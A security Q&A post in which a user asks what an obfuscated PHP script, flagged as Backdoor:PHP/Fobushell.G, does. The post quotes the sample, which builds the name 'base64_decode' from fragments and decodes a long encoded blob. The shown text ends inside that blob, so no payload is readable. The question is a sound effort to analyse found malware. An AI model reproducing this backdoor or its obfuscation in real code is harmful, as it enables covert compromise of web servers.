# What does this malicious PHP Backdoor:PHP/Fobushell.G script do?

Tags: malware

I've seen things like this before ([like in this post](https://security.stackexchange.com/questions/86094/what-does-this-malicious-php-script-do)) and usually it's pretty easy to just print out the base64_decode of code.

However, when I print out the base64_decode of the string, what I get back looks like Chinese or some weird character encoding.

```
<?php $_f___f='base'.(32*2).'_de'.'code';$_f___f=$_f___f(str_replace("\n", '', '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
